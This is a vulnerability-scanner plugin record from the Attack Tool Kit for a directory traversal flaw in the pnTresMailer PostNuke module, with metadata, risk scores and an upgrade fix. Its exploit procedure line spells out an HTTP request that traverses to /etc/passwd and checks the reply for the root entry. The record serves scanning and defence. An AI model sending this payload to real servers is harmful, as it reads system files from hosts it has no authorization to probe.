Post-Nuke pnTresMailer codebrowserpntm.php directory traversal 1.0
 
Plugin ID327
Plugin namePost-Nuke pnTresMailer codebrowserpntm.php directory traversal
Plugin filenamePost-Nuke pnTresMailer codebrowserpntm.php directory traversal.plugin
Plugin filesize2396 bytes
Plugin familyCGI
Plugin created nameMarc Ruef
Plugin created emailmarc.ruef at computec.ch
Plugin created webhttp://www.computec.ch
Plugin created companycomputec.ch
Plugin created date2005/01/09
Plugin version1.0
Plugin protocoltcp
Plugin port80
Plugin procedure exploitopen|send GET /codebrowserpntm.php?downloadfolder=pnTresMailer&filetodownload=../../../../../../../../../../../etc/passwd HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *root:*
Plugin exploit accuracy98
Plugin commentThe NASL script is Copyright (C) 2004 Tenable Network Security
Bug affectedPost-Nuke
Bug vulnerability classDirectory Traversal
Bug descriptionThe remote host is running a version of the pnTresMailer PostNuke module which is vulnerable to a directory traversal attack. An attacker may use this flaw to read arbitrary files on the remote web server, with the privileges of the web server process.
Bug solutionUpgrade to the latest version of this module.
Bug fixing timeApprox. 1 hour
Bug exploit availabilityYes
Bug exploit urlhttp://www.securityfocus.com/bid/11767/exploit/
Bug remoteYes
Bug localYes
Bug severityHigh
Bug popularity7
Bug simplicity9
Bug impact9
Bug risk8
Bug Nessus riskMedium
Bug check toolsNessus can check this flaw with the plugin 15858 (Post-Nuke pnTresMailer Directory Traversal).
Source SecurityFocus BID11767
Source Nessus ID15858
Source LiteratureHacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427
Source Misc.http://www.computec.ch

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.